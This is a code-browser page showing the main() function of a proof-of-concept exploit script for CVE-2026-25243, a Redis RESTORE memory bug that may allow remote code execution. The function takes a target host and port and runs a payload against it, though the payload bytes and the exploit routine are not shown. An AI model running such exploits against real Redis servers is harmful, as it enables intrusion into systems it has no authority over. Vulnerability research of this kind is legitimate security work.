INNER CODE UNIT · Python

main

Unclecheng-li/poc-lab · Databases/CVE-2026-25243 Invalid Memory Access in Redis RESTORE Command May Lead to Remote Code Execution/exploit/exploit.py:57

def main() -> None:
    ap = argparse.ArgumentParser(description="CVE-2026-25243 (dump.tcl PoC)")
    ap.add_argument("--host", default="127.0.0.1")
    ap.add_argument("--port", type=int, default=6379)
    ap.add_argument("--hex", action="store_true", help="Print payload hex and exit")
    args = ap.parse_args()

    if args.hex:
        print(f"payload ({len(PAYLOAD)} bytes): {PAYLOAD.hex()}")
        return

    print(f"[*] payload {len(PAYLOAD)} bytes (tests/unit/dump.tcl)")
    print(f"[*] {args.host}:{args.port} via RESP")

    try:
        out = run_poc(args.host, args.port)
    except OSError as e:
        print(f"[!] connect failed: {e}", file=sys.stderr)

View source record →

📰 Research Paper
Loading…
⏳ Fetching content…